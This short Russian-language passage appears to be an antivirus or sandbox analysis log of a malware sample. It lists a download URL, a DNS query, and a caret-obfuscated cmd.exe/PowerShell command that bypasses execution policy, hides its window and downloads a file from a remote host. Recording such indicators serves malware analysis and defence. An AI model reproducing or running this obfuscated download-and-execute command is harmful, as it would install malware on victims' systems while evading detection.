Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^W^e^rsHE^LL.eXE^ ^-^e^XECU^Ti^onPOlIcy byPAsS^ -^n^o^PRO^fIle ^-^WiN^D^OWsT^Yle h^ID^De^n (new^-^OB^ject SYST^EM^.Ne^T^.We^BcLi^e^nt).^DOw^nL^oA^D^FI^le(^'http://www.zoer...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "p^o^W^e^rsHE^LL.eXE^ ^-^e^XECU^Ti^onPOlIcy byPAsS^ -^n^o^PRO^fIle ^-^WiN^D^OWsT^Yle h^ID^De^n (new^-^OB^ject SYST^EM^.Ne^T^.We^BcLi^e^nt).^DOw^nL^oA^D^FI^le(^'http://www.zoer...' (со скрытым окном)